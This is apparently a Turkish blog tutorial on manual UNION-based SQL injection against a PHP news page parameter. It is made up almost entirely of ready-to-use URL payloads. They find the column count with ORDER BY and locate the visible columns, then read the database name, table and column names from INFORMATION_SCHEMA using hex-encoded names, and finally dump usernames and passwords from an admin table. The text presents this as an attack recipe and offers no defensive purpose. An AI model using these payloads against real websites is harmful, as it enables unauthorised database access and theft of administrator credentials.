Manuel SQL İnjection Tespiti (Matematiksel)
Manuel SQL İnjection Tespiti (Tırnak İşareti)
4 ID li Sayfamız;
Kolon Sayısını Bulmak
xx.com/haber.php?id=4%27+ORDER+BY+1+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+2+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+3+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+4+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+5+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+6+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+7+--+- (Sitede Hata/Veri Kaybı Yok)xx.com/haber.php?id=4%27+ORDER+BY+8+--+- (Sitede Hata/Veri Kaybı VAR)
Kolon Sayıları Ekrana Yazdırma
xx.com/haber.php?id=4%27+UNION+ALL+SELECT+1,2,3,4,5,6,7+--+-
xx.com/haber.php?id=4%27+and+false+UNION+ALL+SELECT+1,2,3,4,5,6,7+--+-
Database Adını Öğrenme
xx.com/haber.php?id=4%27+and+false+UNION+ALL+SELECT+1,2,3,4,database(),6,7+--+-
Tabloları Ekrana Yazdırma
xx.com/haber.php?id=4%27+and+false+UNION+ALL+SELECT+1,2,3,4,(SELECT+GROUP_CONCAT( table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_ SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x69705F7768697A),6,7+--+-
Tablonun Kolonlarını Ekrana Yazdırma
xx.com/haber.php?id=4%27+and false+UNION+ALL+SELECT+1,2,3,4,(SELECT+GROUP_CONCAT( column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION _SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646D696E),6,7+--+-
Kırmızı İle İşaretlediğim Yer Encode Ettiğimiz Metnin Önüne Koyulmalıdır Sarı ile İşaretlediğim Yer ise Encode Edilmiş Tablo Adımızdır, İşlemleri Yaptıktan Sonra Integer (5) Kolon Sayınızın Yerine Tablo Kolonlarımız Gelecektir.
Kolonların Değerlerini Ekrana Yazdırma
xx.com/haber.php?id=4%27+and false+UNION+ALL+SELECT+1,2,3,4,(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+ip_whiz.admin),6,7+--+-
Yeşil İle İşaretlediğim Yer Hangi Kolonların Değerlerini Almak istiyorsak İsimlerin Yazıldığı Yer, Kırmızı İle İşaretlediğim Yer Database Adımız, Sarı İle İşaretlediğim Yer Tablo Adımız. İşlemleri Yaptıktan Sonra Integer (5) Kolon Sayınızın Yerine Tablo Kolonlarımızın Değerleri Gelecektir.
0 Yorumlar